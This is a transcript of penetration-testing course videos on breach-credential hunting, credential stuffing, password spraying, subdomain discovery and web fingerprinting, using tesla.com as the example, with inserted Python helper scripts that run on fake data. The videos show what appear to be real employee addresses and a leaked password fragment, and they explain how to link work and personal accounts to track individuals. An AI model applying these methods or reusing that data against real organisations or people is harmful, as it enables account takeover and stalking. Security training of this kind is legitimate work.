So what we're going to do is I'm going to go ahead and go into the terminal, make it a little bigger, and then I'm just going to change into that folder, breach-parse, and I'm going to run breach-parse. So breach-parse here, and what we're going to do is I'm just going to say @tesla.com and then tesla.txt, and that's going to run. So again, you do not have to install this; this is only for visual purposes. I'm going to show you in the next video another way to do this. This is going to run through, it's going to take a minute here, and it's going to grab everybody's username and password that has tesla.com in the username, and then it's going to have all the passwords, and we're going to be able to decipher things from this. So I'm going to let this run, and as soon as it's done I'll come back and we'll talk about the results.

Okay, the results are back. This breaks it down into three files: there is a tesla-master, a passwords file and a users file. So the master has the username and password, the users file has the users and the passwords file has the passwords. So I'm actually going to gedit the tesla-master.txt and let's take a look at this. From here we don't have a big list, surprisingly, for a company the size of Tesla. So what happens is people utilize their work credentials, their work emails, and they log into websites they probably shouldn't be using their work emails for, and we just use it to our advantage. So what we're after is not only these usernames but these passwords as well. We see these usernames and we see these passwords, and I like to look for repeat offenders. I like to look for the syntax as well: remember we had first initial, last name, but we see first name dot last name here, we see possibly just a single name. There are different types of things in here, so a nick@tesla.com as well. So, you know, it's changed up. I think nowadays it is first initial, last name, but maybe in the past they used first name dot last name and then moved to an easier format, or vice versa: they started first initial, last name, they got too big, then they had to do first name dot last name. But again, what we're after here is potential repeat offenders. So look at this: shark@tesla.com.
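As an added example (this is not the course's breach-parse script, nor any code from the course), the Python below does what the lecture describes breach-parse doing, then adds the checks the lecture goes on to make by eye: it pulls every record for one domain out of a breach-compilation-style set of files, splits the result into master, users and passwords lists, counts the address formats, and flags repeat offenders whose passwords differ only in case or punctuation, plus any password in the season-plus-year family. The records are constructed and fake, with example.com standing in for the client domain; the file layout (one file per leading character, email:password lines, some malformed) follows the lecture's description of the BreachCompilation data directory. From the defender's seat this is the triage that decides which accounts get a forced reset and which password patterns go on the banned list.

```python
"""Exposure triage over a breach-compilation style dump.

Added example, not the course's breach-parse script. Input records are
constructed and fake; example.com stands in for the client domain.
"""
import re
from collections import defaultdict

# Constructed sample: files keyed by the first character of the email,
# each holding "email:password" (sometimes "email;password") lines, as the
# lecture describes for the BreachCompilation data directory.
SAMPLE_FILES = {
    "a": ["alice.chen@example.com:Winter2019!", "amir@mail.example:letmein"],
    "b": ["bjones@example.com;Spring2020!", "bob.smith@othercorp.example:hunter2"],
    "n": ["nick@example.com:qwerty123", "NICK@example.com:Qwerty123!"],
    "s": ["shark@example.com:Sp4rrow907!", "shark@example.com:sp4rrow907",
          "s.lee@example.com:Summer2020!"],
    "x": ["no-separator-here", ":missing-user", "x@example.com:", "x@notexample.com:pw"],
}

# Season + year (+ trailing symbols), the family spraying lists lead with.
SEASON_YEAR = re.compile(r"^(spring|summer|fall|autumn|winter)\d{2,4}[^a-z0-9]*$", re.I)


def parse_line(line):
    """Split one dump line into (email, password); None if malformed."""
    parts = re.split(r"[:;]", line.strip(), maxsplit=1)
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return None
    email, password = parts
    if "@" not in email:
        return None
    return email.lower(), password


def search_domain(files, domain):
    """Equivalent of breach-parse's search for '@domain': every well-formed
    record whose email belongs to exactly that domain (not lookalikes)."""
    suffix = "@" + domain.lower()
    records = []
    for name in sorted(files):
        for line in files[name]:
            parsed = parse_line(line)
            if parsed and parsed[0].endswith(suffix):
                records.append(parsed)
    return records


def split_outputs(records):
    """Mirror breach-parse's three output files: master, users, passwords."""
    master = [f"{email}:{password}" for email, password in records]
    users = [email for email, _ in records]
    passwords = [password for _, password in records]
    return master, users, passwords


def password_core(password):
    """Normalize away case and punctuation so 'Sp4rrow907!' and 'sp4rrow907' match."""
    return re.sub(r"[^a-z0-9]", "", password.lower())


def repeat_offenders(records):
    """Emails that appear more than once, with the passwords seen for each."""
    seen = defaultdict(list)
    for email, password in records:
        seen[email].append(password)
    return {email: pws for email, pws in seen.items() if len(pws) > 1}


def variant_only_reuse(records):
    """Repeat offenders whose passwords all share one core: the user recycles
    one password with case/symbol tweaks, so these are the first resets."""
    return sorted(email for email, pws in repeat_offenders(records).items()
                  if len({password_core(p) for p in pws}) == 1)


def season_year_passwords(records):
    """Distinct passwords matching the season+year pattern."""
    return sorted({p for _, p in records if SEASON_YEAR.match(p)})


def local_part_styles(records):
    """Count address formats across distinct users (dotted 'first.last'
    versus plain 'flast'/'first') to read the org's naming convention."""
    counts = {"dotted": 0, "plain": 0}
    for email in sorted({e for e, _ in records}):
        local = email.split("@", 1)[0]
        counts["dotted" if "." in local else "plain"] += 1
    return counts


if __name__ == "__main__":
    recs = search_domain(SAMPLE_FILES, "example.com")
    master, users, passwords = split_outputs(recs)
    print(f"{len(master)} records; formats: {local_part_styles(recs)}")
    print("repeat offenders:", repeat_offenders(recs))
    print("variant-only reuse (reset first):", variant_only_reuse(recs))
    print("season+year passwords:", season_year_passwords(recs))
```

Two design points worth noting: `search_domain` matches on the `@domain` suffix rather than a plain substring, so `x@notexample.com` is not swept in with `@example.com` the way a naive grep would sweep it in, and `variant_only_reuse` compares normalized cores rather than raw strings, which is how the "very, very similar" passwords the lecture points at get surfaced automatically.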
It got popped twice, and the password is very, very similar. So if I were to attack tesla.com through a login interface, I might spray this username with this password and this password; that's what we call credential stuffing, because we already know the passwords. And then I might make some modification of capitalized and non-capitalized letters with d-a-d-e, because 907 and 814 appear to be consistent, so I would alternate capitals and lowercase here and just see if something sticks. So this is something that's interesting. This user down here, 1234512345*, probably not going to get in with that on a company like Tesla, but you never know. But this is what we would do: we would take the usernames and we would throw these passwords at them, and that's called credential stuffing. And then we would take these usernames, and all the known usernames, and we would spray passwords at them like Fall2019, like we talked about in the last video; that's password spraying. So this is an important and very, very critical part of information gathering: gathering these usernames and these credentials. Right off the bat you want to identify those with your targets. So this is kind of what it looks like; this is what I do during every assessment, and hopefully that makes sense and that works into it. In the next video we're going to go ahead and just show another method and start thinking again about these credentials and how they can be utilized, and then we'll do some other information gathering as we move on and learn some techniques and how we can get information on a client. So I'll see you over in the next video.

Okay, let's talk about hunting breach credentials, and let's get hands on. Now before we get started, I know I stressed this in the beginning of the course, and I'm going to stress this again: what I'm going to show you here could change. I released a course about a year ago which was on ethical hacking; we talked about breach credentials, and I utilized a website called WeLeakInfo. WeLeakInfo was then eventually shut down, and I got all kinds of emails saying, hey, this is shut down, I don't know what to do. There's more out there, okay? There's always more out there. What I'm showing you is the methodology. I could show you on a specific website, which I'm going to do; that website could go down tomorrow, we never know. But what you need to retain is the thought process and the methodology behind what's about to happen. From there you could take that and utilize it elsewhere, so if a website does go down you still have the same thoughts: why you're doing it and why you're thinking about it.

So let's go ahead and move over to a website now. I want to take you to a website called DeHashed; this is dehashed.com. I do not expect you to be able to follow along at this point because this costs money, okay? It's five bucks for a week, it's a hundred and fifty dollars for a year. This used to take credit cards; they now only take Bitcoin, I do believe, or some sort of cryptocurrency. Absolutely worth it in my opinion. Even get a week; get a week, see if you like it. It's amazing. There are going to be tools I show you later on in the course that we'll go through and can do locally, like the one I just ran in the last video: I ran breach-parse, right? This is something that I put together and set up, and it's free, but the database isn't maintained, it's a slow search, I don't get the results back as instantly, and I can't tie it to as many data points as a website like this can. I think this website is great.

Now let's talk about what DeHashed can do now that I'm logged in. We have the ability to search by (let me make this a little bit bigger) email, username, IP address, name, address, phone number, VIN. Okay, think about this. Say we know an email address; say it's bob@tesla.com. We're not going to search this yet. We take Bob, and we know Bob has an account and we're looking for him, we search him, Bob shows up, and we see maybe his name, like Bob Jones or something like that, shows up. Maybe something that he's been leaked in has his address, or maybe there was an IP address tied to the client you're looking for or the person you're looking for. This can all be identified. What if Bob has a username like bobrocks123? Okay, well, we can search that username in here and see if that username has repeated itself at all, which is great. We could search by password, so say Bob's password was bobrox123: we could search that password, and if it's unique enough, then maybe we can actually do some advanced searching. Like if we go back to the example from the last video, we saw this 907dade814; we could put that into the search engine and see if that comes back to something else. Maybe that comes back to a user that is not at tesla.com but maybe it's like bob@gmail.com, and then guess what, now we have Bob's personal account, or now we have Bob tied to another email account, especially if we search by name or something that we can tie them together with. We need to start being able to relate other accounts to each other. We can do that with hashing, we could do that with passwords; there are a lot of things that we can do, and we want to start tying this together.

As a real-world example, when I am looking at an organization and I'm doing research on DeHashed, or I'm doing research on breach credentials, I'm trying to think, okay, first, if my client is tesla.com, I might come in here and search @tesla.com and see how many results are in here. Let's see what happens. Okay, here's george@tesla.com; George has been in shared data, so there aren't any actual details here besides a potential username, a name, an email. Okay, same thing with "safety". We'd have to scroll down and see if we can find something. Okay, here's Adobe. Now Adobe will have... there's actually a bob@tesla.com; bob@tesla.com has a hashed password here. Okay, so now we can say, well, first of all, we can go see if we can figure out what this hash is, which we'll talk about in a second. We can also go and say, okay, Bob, does Bob exist anywhere else, does this hash exist anywhere else on this website, can we tie it to another account? Then maybe even if we don't crack the password, we can say, okay, this Bob ties to bob@gmail.com. So I would note this down and I would take this and copy it. From a real-world example, I would take all the data that I see on this website; I would collect all of the passwords, all the usernames, everything. So like tesla9, all of this: I want to know what the passwords are, I want to know who the people are, I want to know all the data, because if I could start finding patterns, if I could start putting things together, maybe I can even relate these back to their personal email accounts like we're talking about, and then I can see password patterns there or other passwords, and just start tying this down. Because my goal is to break into an organization; if I'm doing a pen test, my goal is to break into an organization. So I'm going to take that data, and if I can find other passwords related to a personal account, I'm not going to go attempt to break into a personal account, but I will take that data and I will put it together and maybe try to break into their work email account with those passwords, that information. This can tie to an investigation as well. If you're hunting down an individual, you're trying to tie them to other accounts, this is incredibly useful. If you can find their data in a breach database and have a password, and that password's unique, you can search it and maybe find them somewhere else. You find an IP address, you find a name; there are often IP addresses in here which we can tie to a location, possibly. And see, here's that 907dade814; we could take this and maybe search it and see if it comes back with anything. Who knows. shark@tesla... shark@mail.ru, look, this is a new email address we didn't know about before. And look, it does us a favor: we searched d-a-d-e, but here's the capitalized version; we didn't search for capitalized, we're not searching specific. Okay, and now we're getting more information. Look, here's one for Dropbox. Okay, so it tells you where this is coming from and how you can tie it in. If we can get any sort of name out of this, any sort of anything, that would be amazing. We can get a person's name or IP address and we can start tying them down. But when you're doing different searches like this, you need to start, almost, you know, like in the investigations where they have the red yarn and it's going from one pin to another; you kind of have to zigzag that back and forth and really try to tie this down. You'll see that when we get into reporting how you might take one individual and really just see, like, a password tied to an account tied to this, and this was the exact methodology that we took to get to that point. Because when you write a report you want to make sure that the investigative person, or say you're handing off to the police or whatever, you want to make sure that the person can replicate what you did with ease, and there's no question about it.

So this is some of the searching that we can do. Now if we come to DeHashed again, we can come here and search by email, username, name, anything. So you can put your name in here; I mean, if you want to search on here, I think it's great, you can come through here and just search for your name. Let's go back; let's search Tesla again. I saw a hash in there; the Adobe hashes are kind of interesting, they're not the easiest to pick up, but let's find this Adobe hash. Let's say we get a hash like this. We could try to identify what this hash is, we can try to crack this hash, we can see if it's been cracked somewhere else. This hash, as of right now, we have no idea, but we know
bob@tesla.com. We can maybe paste this in here first of all and see if it ties back to anything, and there are 22 results back. You know, I would probably be looking for somebody that has this password with the name of Bob; it's probably not going to be like a Brett or a Michael. We might want to see if we can find another account somewhere else, but these are all tying down to a hash from Adobe, so depending on how they were hashing this data, we might not find anything else of interest. But you can see all the things here, all the different opportunities that are here for us to just do research and tie down information.

Now we can go to a website called hashes.org, and if we come here we have the capability to actually try to search for this hash. So we could search hashes and see if we can find it. You can come in here and just paste it, and again it doesn't do a great job, in my opinion, with the Adobe hashes; sometimes they crack, but a lot of times it says it can't find them. Oops, there we go, let's try hitting search here. Okay, so it says not a valid hash. Now if you put this into Google as a search, you can see it didn't come back with anything either. So we want to make sure that when we're searching this we try all options. There is an Adobe database; if you do put in a hash and it does show up, there's a GitHub Adobe database that will actually show up here.

So with that being said, this is kind of what I want you to start thinking about when we're hunting down breach credentials: how can I take a person or company that I'm looking into? If you have a company, you can just go @companyname.com or .net or whatever it is, search in here, and see how they show up. If you have a person, maybe a personal email account, if you can find that person, if you know their email account, you come in here and say bob@gmail.com. Maybe you don't know what their email address is; then maybe you come here to the main page and go, okay, I'm going to look for a name, I'm going to look for Bob Jones, and search for that, and then you start taking this and trying to find the patterns. If you know Bob lives somewhere, maybe you could find an address for Bob, or maybe you know Bob lives in, like, Arizona; you could search Bob Jones and see if Bob shows up, and then kind of take it from there. There are some search operators that you can utilize. You can see Bob Jones is taking forever; you can put this in quotations and search it again and kind of narrow down your results here. So if we click on this, you can see, like, here's a name... we got a lot of results, but here's the name Bob Jones; this is a very common name. But you could see, if we're trying to lock this down, we can start searching and adding operators in here and trying to see if we can figure out how to tie a username or something to them. So again, get your wheels spinning. Don't rely on just DeHashed; rely on thinking about this. This is the thing you should think about; again, DeHashed could go down tomorrow, but if you're thinking about it in the way that the credentials and the information can be interwoven, remember that red yarn again, that's really what I want you to take away from this. So we're going to do another video on this; I'm going to show you some more, I guess, tools that are out there and some other things that you can do, offer alternatives to this, and then we'll wrap up this section. So I'll catch you over in the next video.

The next several videos are going to talk about web information gathering. This is going to be important because a lot of the time we're going to be tasked with a web penetration test, or we might encounter a website on an external or internal penetration test, and being able to gather information and perform enumeration on those websites is super important. So what I'm going to show you throughout is how to gather some of the information passively that is out there, and then we'll talk about active methods that actually involve going out to the website and
gathering information that way as well so the first and most important thing especially when it comes to websites or bug bounty hunting etc is that we need to identify what sub-domains are out there and you saw earlier when we were looking at tesla it had a scope of something like asterix tesla.com this asterisk is a wild card this means that anything and everything is open to us in the scope except it was out of scope in the sub domain range now we can utilize tools to our advantage to discover these subdomains why are subdomains important well we might run into something that is like dev.tesla.com or we might run into a website that should have never been out there right like the dev or like uh test site.tesla.com for example or you might find login forms another reason that it's so important is because if you just look at tesla.com you're limiting yourself to one website where there could be potentially tons of websites on these sub domains so we really really need to hunt these and be certain that we're incorporating everything that we can when we're doing our assessments so one great tool that i want to point out is a tool called sublister now we need to install that so let's type in app install sublister like this okay and this will just take a second to get it all set up and we will utilize this tool to get these sub domains okay now that it's set up all we have to do is type in sublister hit tab for auto complete hit enter and it gives you the syntax we can do a dash dash h for help or dash h for help and all we really need here is a domain so we can say dash d for tesla dot com and it's going to start searching for tesla dot com and don't worry about this error if you get the air so it's looking through all these different search engines similar to what the harvester was doing but you're going to see that it's going to return quite a bit more so we see baidu yahoo google it's going to go through all these and try to search now while this is going on i want 
to point out another way to do this so let's go out to the web and let's go and load up another site called crt.sh so we say crt.sh like this it'll load up a website like so let me make this a little bigger for you and we can do the wild card ourselves so you see the percentage is a wild card so we're just going to say percent.tesla.com now we're doing is we're using certificate fingerprinting now we're going to go out and look for certificates that have been registered and it's going to attempt to find those and tell us what's out there so you can see that we can find energysupport.tesla.com gridlogic.energy.tesla.com and we would scroll through these and try to identify all the different ones like sso single sign-on that might be interesting if i could find anything in here that's like vpn.tesla.com or dev.tesla.com any sort of thing like that i'm also interested in it api toolbox could very well be interesting sso-dev.tesla.com so these are the sort of things that we're after and you see right now that we have different levels to domains like here you see that we have our sub domain but what about a sub sub domain like a fourth level of a domain you see gridlogic.energy.tesla.com so we can go deeper and deeper when it comes to these domains and what sublister is going to be doing right now is it's going to try to find just the sub sub domain so it's going to look for third levels it would not discover this gridlogic.energy.tesla.com without a little bit of finagling and looking through the help to figure out how to do that so we can come to a site like crt.sh to see if we could find any additional sub domains within this and we can utilize tools like sublister as well so i'm going to let this finish but in the next video i'm going to show you is i'm going to show you how to improve upon this process with some tools that have been written in go that i think are fantastic so i'm going to let this run we're going to have part 2 of this video where we actually 
review the results and then we'll go from there. So I will see you over in the next video. Okay, so we have our results back. In part one we went pretty quick; in part two I want to talk about the results, what might be interesting here, and then identify some other tools that you can download and use and go play with on your own. So this has identified quite a few things; I mean, there's a big list here, 87 subdomains. And I lied to you when I said that it didn't get fourth levels. I thought there used to be a recursive feature where you'd have to do a -r to get those; now you don't have to do that, it just picks up fourth levels for you. Now Sublist3r is great at finding some of these things. Like if we come through here, there is a dev.tesla.com, and I saw down towards the end that there was some staging, staging2 here, a dev here, a test. These all look juicy. sso-dev looks juicy. I might be after something like qa as well, or something like vpn.tesla.com. I want to know where your mail is at, so here's webmail, xmail, anything here. You could also look through these lists and possibly identify what kind of tools they're using; you might see something like link.tesla.com or zoom.tesla.com, and this really just kind of drives home what they're running on their back end for a lot of things. Now this isn't all-inclusive. Sublist3r is a great tool; Sublist3r was ahead of its time when it came out, but there are better tools out there. There are tools that incorporate pretty much everything in one go, so you might have crt.sh like this, you might have Sublist3r included, and the one tool that is really popular, if you go out to Google and type in OWASP Amass, this is the go-to tool for a lot of people doing bug bounty hunting. So if we click on the Amass project here on GitHub, you can download the project and install it per the installation instructions here, so you have an installation guide down in the documentation. The reason I have chosen not to show it in this series is because actually
running Amass takes a long time, but you can configure Amass to do a lot of things and find a lot more subdomains. So my challenge to you is to get Amass installed, and on top of that, see how many more subdomains than 87 you can find when you actually run it. So another last thing to point out: if you want to use Sublist3r, and you used it and it was really, really slow, it's always helpful to check the -h on the help, and you can see in here that there is a -t for threads. Always check the help. So we can specify a domain like we did before, do something like -d of tesla.com, and then you can specify threads, like a hundred, as opposed to maybe the one thread or ten threads that it was running originally. We give it a hundred threads, it's gonna go a lot faster, we're gonna get a lot more results. You could also do a -v for verbosity here and get your results in real time if you're impatient or you're trying to go out to the web. So there are great tools out there for doing subdomain hunting, and again subdomain hunting is very, very critical, because if we just limited ourselves to tesla.com, look at all the things that we would miss. So we can find out a lot here. Now not all of these pages are going to be alive. Also there's a good possibility that we can go to something like this mfa.dev or dev.tesla.com and then it won't work. We can give it a go and see. Like, not always do these work; these are what show up in search engines, but it's worth knowing about them. And there are other tools out there, such as, let's go to Google, such as tomnomnom's httprobe, like this. Tools like that out there will probe the list that you give it; you can give this list to the probe, and it'll say hey, this website's alive, or this website's not alive, and then you can start narrowing down these lists as well. So that is something to think about when you get your wheels spinning, but for now, for information gathering and for the scope of this course, we don't have to worry about it too much,
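Editor's note, added example: the script below is not code from the video, from Sublist3r, or from crt.sh. It parses crt.sh-style JSON into a deduplicated subdomain list, groups hosts by label depth (the third-level names Sublist3r is described as finding versus the fourth-level gridlogic.energy.* case pointed out above), and flags the names the video calls juicy. The JSON is a constructed sample shaped like crt.sh's output=json response; it is not real data about tesla.com, and the domain, hostnames and keyword list are illustration only.

```python
"""Added example, not code from the video or from Sublist3r/crt.sh: parse
crt.sh-style JSON into a deduplicated subdomain list, group hosts by label
depth, and flag names worth a closer look. SAMPLE_CRTSH_JSON is a
constructed sample shaped like crt.sh's ?q=%.example.com&output=json
output; it is not real data about tesla.com."""
import json
from collections import defaultdict

SAMPLE_CRTSH_JSON = json.dumps([
    {"name_value": "energysupport.example.com"},
    {"name_value": "gridlogic.energy.example.com\nenergy.example.com"},  # SAN list
    {"name_value": "*.example.com"},                                    # wildcard cert
    {"name_value": "sso-dev.example.com"},
    {"name_value": "SSO-DEV.example.com"},                              # case duplicate
    {"name_value": "vpn.example.com"},
    {"name_value": "example.com"},                                      # apex, not a sub
    {"name_value": "notexample.com"},                                   # lookalike, out of scope
])

# Keywords from the video's list of subdomains worth a closer look
INTERESTING = ("dev", "test", "staging", "qa", "vpn", "sso", "mail", "api", "admin")


def parse_crtsh(raw_json, base_domain):
    """Return sorted unique hostnames under base_domain.

    crt.sh packs SAN entries into name_value separated by newlines, so each
    entry is split. A leading "*." is dropped because it is a certificate
    pattern, not a resolvable host. Anything not ending in ".<base_domain>"
    (the apex itself, or a lookalike such as notexample.com) is skipped.
    """
    base = base_domain.lower()
    suffix = "." + base
    hosts = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]
            if name == base or not name.endswith(suffix):
                continue
            hosts.add(name)
    return sorted(hosts)


def depth(host):
    """Label count: sub.example.com -> 3, a.b.example.com -> 4."""
    return len(host.split("."))


def by_depth(hosts):
    """Group hosts by depth so fourth-level names stand out."""
    buckets = defaultdict(list)
    for h in hosts:
        buckets[depth(h)].append(h)
    return dict(buckets)


def interesting(hosts, keywords=INTERESTING):
    """Hosts whose leftmost label contains one of the keywords."""
    return [h for h in hosts if any(k in h.split(".")[0] for k in keywords)]


if __name__ == "__main__":
    found = parse_crtsh(SAMPLE_CRTSH_JSON, "example.com")
    for d, names in sorted(by_depth(found).items()):
        print(f"level {d}: {names}")
    print("worth a closer look:", interesting(found))
```

To run it against real output, save the JSON that crt.sh returns for a wildcard query with output=json and pass that string to parse_crtsh; the liveness check with httprobe that the video mentions is the natural next step on the resulting list.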
but I do want to point out some other alternatives and ways to do subdomain hunting, and then what to look for in subdomain hunting. So that is it for this video; I'm going to catch you over in the next one. Now the next few videos have to deal with web apps as well, but instead of looking at subdomains we're going to look at what a website is built with, and that's a good indicator here of BuiltWith. So let's go out to Google and we're going to just search BuiltWith; we're going to go right to builtwith.com and let's take a look at what this does. So let's just search tesla.com for example, we'll do a lookup, and I'm going to make this a little bit bigger so you can read it. And what this does is it goes out and it looks at what type of tech Tesla's running. Now it gives all this stuff that it can see, Google Analytics, Salesforce, that's great, but it also tells us the widgets that are running; you can see it is part of Bugcrowd, LogMeIn, Twitter. Okay, it's got these language things here, but what we're really after is what kind of frameworks it might be running on. So it says here that it's running on PHP, it has Adobe Enterprise Cloud, okay, that's interesting, it's got CDN, the content delivery network, interesting, it utilizes Stripe, okay. We can scroll through this; looks like it might be written in Drupal, that's an indicator there. And this is a big website, so it's got a lot; look at all the information here, and it might be a lot to track down. So with a big website like this there's a better way, I think. Now BuiltWith is a great, great resource, but I think there's some other stuff out there that might help us a little bit better. So let's go out to Google as well and let's search for a tool called Wappalyzer, just like this, and we're going to use it for Firefox, so it should pull this up here, and we'll click on the first one and go ahead and just select Add to Firefox, select Add, and now it will appear. So now we have Wappalyzer; let's go back to Tesla and you see this little
guy here in the corner. We're going to click on this, we're going to accept it, and now we get a little bit of information as to what's going on. Not as much information as BuiltWith, but I actually like Wappalyzer a lot more because it kind of just gives you an indication right away of what's going on. Now Wappalyzer is more of an active type of reconnaissance. I only say that, and I don't necessarily believe it, but it's because we do have to interact with the website. Now we're not doing any type of scanning; we're just going out to the website like a normal user would, and to me it's still kind of passive because we're not doing anything that would be out of the norm. So here we can see the content management system is running on Drupal, we can see the programming language is running PHP; those are both identified with BuiltWith as well. Now why is this important, you're telling me? Well, it's important because if we know that it's running with PHP or Drupal, there might be a vulnerability within those. A lot of times when we have this, let's see, if we go to this website, you can see PHP's running, we get a lot of things and we get version numbers. So look at the Wappalyzer website: you see that it's running on an operating system of Ubuntu, it's got a programming language PHP, the web server is nginx with 1.14.0 version number, okay. It can tell that it's running on Amazon Web Services as a platform, it's got all kinds of information here, it's got the payment processing, it's running Google Analytics. So see the type of information that can come through. A lot of times you'll see things like jQuery and other types of libraries here, and the version numbers as well. Now you take those version numbers and you do enumeration on them and you try to find any type of vulnerabilities that might happen there, and the more information that we can gather on a client, on a website, whatever it is, the better off we are. So when we're gathering information on Tesla, okay, now we know the content management
system is written in Drupal, the programming language PHP. Is that going to lead to an exploit? Maybe, but you don't know where it's going to come up in the future, so this type of information gathering is great. Now one more thing that we can use: we've got something built into our machine. Let's go out to the terminal and we can take a look at it. So we've got a tool called whatweb, just like this, and hit enter on it, and if we look at the syntax, all we need is to specify a target, so we enter the URL, hostname, IP address or nmap format. So we just say whatweb URL. So let's give it a go: we'll say whatweb and we'll just say https://tesla.com, and it is a redirect, so it might not pull down everything for us here. So it did pull down an IP address, it gave us a redirect; I don't know if there is a follow-redirection option here, um, but what we'll do is we will just say something instead, we'll say like tesla.com instead of 443 and see if that does anything different. And it didn't. So it does give us some information in here; it's not as pretty of a layout, but it is a tool that is built in to Kali Linux for us. So look, we can pull down Drupal 8; we didn't know what kind of Drupal it was running on, now we know it's Drupal 8.
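Editor's note, added example: the following is not code from the video, nor from whatweb, Wappalyzer or Burp. It shows where the clues those tools report come from, by reading a raw HTTP response and pulling out the Server, X-Powered-By and X-Generator headers, a Drupal-specific header, and a meta generator tag in the body, and it walks a redirect chain so the first hop's leak (the redirect case hit above with whatweb) is not lost. Both responses are constructed samples that mimic the PHP 7.3.7 / Drupal 8 / nginx 1.14.0 findings discussed; they are not captures from tesla.com, and the hostnames are placeholders.

```python
"""Added example, not code from the video or from whatweb/Wappalyzer/Burp:
a minimal fingerprinter that reads a raw HTTP response and pulls out the
same clues those tools surface (Server, X-Powered-By, X-Generator,
Drupal-specific headers, a <meta name="generator"> tag), and walks a
redirect chain so the first hop's leak is not lost. Both responses below
are constructed samples, not captures from tesla.com."""
import re

# Constructed: the redirect case the video hit with whatweb on https://tesla.com
REDIRECT_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Server: nginx\r\n"
    "Location: https://www.example.com/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed: the kind of final page the video describes (PHP 7.3.7, Drupal 8)
PAGE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.14.0\r\n"
    "X-Powered-By: PHP/7.3.7\r\n"
    "X-Generator: Drupal 8 (https://www.drupal.org)\r\n"
    "X-Drupal-Cache: HIT\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html><head>"
    '<meta name="generator" content="Drupal 8 (https://www.drupal.org)">'
    "</head><body>hi</body></html>"
)

# Headers that commonly name a product, often with a version number
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-generator",
                       "x-drupal-cache", "x-aspnet-version")
META_GENERATOR = re.compile(
    r"<meta\s+name=[\"']generator[\"']\s+content=[\"']([^\"']+)[\"']", re.I)
PRODUCT_VERSION = re.compile(r"([A-Za-z]+)/([\d.]+)")


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ")[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def fingerprint(raw):
    """Return the technology clues found in a single response."""
    status, headers, body = parse_response(raw)
    clues = {"status": status, "versions": {}}
    for h in FINGERPRINT_HEADERS:
        if h in headers:
            clues[h] = headers[h]
            m = PRODUCT_VERSION.search(headers[h])
            if m:  # e.g. "nginx/1.14.0" -> {"nginx": "1.14.0"}
                clues["versions"][m.group(1).lower()] = m.group(2)
    m = META_GENERATOR.search(body)
    if m:
        clues["meta-generator"] = m.group(1)
    if 300 <= status < 400 and "location" in headers:
        clues["redirect"] = headers["location"]
    return clues


def follow_and_fingerprint(responses):
    """Merge clues across a redirect chain in order: later hops override
    earlier header values, version numbers accumulate, and the hop list
    records what was followed."""
    merged = {"hops": [], "versions": {}}
    for raw in responses:
        c = fingerprint(raw)
        merged["hops"].append(c.pop("status"))
        merged["versions"].update(c.pop("versions"))
        merged.update(c)
    return merged


if __name__ == "__main__":
    for k, v in follow_and_fingerprint([REDIRECT_RESPONSE, PAGE_RESPONSE]).items():
        print(f"{k}: {v}")
```

The version numbers this extracts are exactly the input for the next step the video describes: enumerating known issues for nginx 1.14.0 or PHP 7.3.7. Note that the redirect alone already leaked the server software, which is why it is worth fingerprinting every hop rather than only the final page.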
We see that it's running PHP 7.3.7; that's identification too that we didn't have previously. So using more tools to our advantage gives us more information, and we can pull down the headers that it has here, and you see they have different types of headers, which we're not going to get into quite yet. When we get into the web app portion of this we'll talk more about headers, but this is just yet another thing that we need to look at. And we pull down an IP address as well, so a little bit more information that we can gather here, and we just keep going from this. So that is it. Utilize the resources around you to gather information. We could utilize resources that go out and scan a specific web page like this, we can go and utilize a resource such as Wappalyzer, where you just visit the web page and you can see what's running on there, or a website like builtwith.com, where we don't even navigate to the website, we just type it in and it does all the work for us and we can pull down all this information, which is by far the most information out of these three tools. So utilize all the resources available to you and you will have many advantages when it comes to pen testing and your enumeration skills. So that's it for this video; I'll catch you over in the next one. Another useful tool when it comes to web applications is a tool called Burp Suite. Now let's go ahead and open up Burp Suite. So we're going to go up to the applications, and in your favorites should exist Burp Suite here. Now Burp Suite is what we call a web proxy. Now web proxy means that it has the capability of intercepting traffic for us, and we're going to see what that looks like. So you're probably going to get this error about this JRE; don't worry about it, we're just going to say okay. You might get a "you need to accept this license agreement" when you first start; go ahead and accept that as well, and if you see an update screen, go ahead and just close it. So we are on the Community Edition, so we will have limited features;
we'll talk more about those when we get to the web application section, but I just want to introduce you to what Burp Suite can do in a very basic form and how we can actually gather some information out of a website from Burp Suite pretty easily. So let's go ahead and just select Temporary project and click Next, and then select Start Burp. Now the first thing that we're going to do is we're going to set up our Firefox for utilizing Burp Suite. So go ahead and go to favorites in Firefox, and I want you to go over to the right-hand little hamburger here, and you're going to go and select Preferences. From Preferences we're going to scroll down all the way to the bottom and we're going to select Settings. Now we're going to select this Manual proxy configuration here, and we're going to say 127.0.0.1 on port 8080. Later, when we get to the web application section, I'll show you a much easier way of doing this with a tool called FoxyProxy, but for right now this is a very high-level overview. So go ahead and use this proxy server for all protocols, and that should fill in the rest down here. We're going to go ahead and hit OK, and we're going to leave this open; I'll show you why in a second. So I also want you to go to a new tab, and I want you to go to https://burp, like this. Now your first page might not show up like this; it might show up with a "you need to accept this certificate." You're just going to say Allow down at the bottom and say yes, permanently store this exception, and then you'll be brought to a screen somewhat like this. So what you're going to do is you're going to go ahead and just click on CA Certificate here and then save the file. Mine is already saved, as you can see in my downloads right here. So what I'm going to do is we're going to go back into Preferences once we have that saved, and we're going to go to Privacy and Security over on the left-hand side. We're going to scroll all the way down to the bottom, and there is a View Certificates button down here,
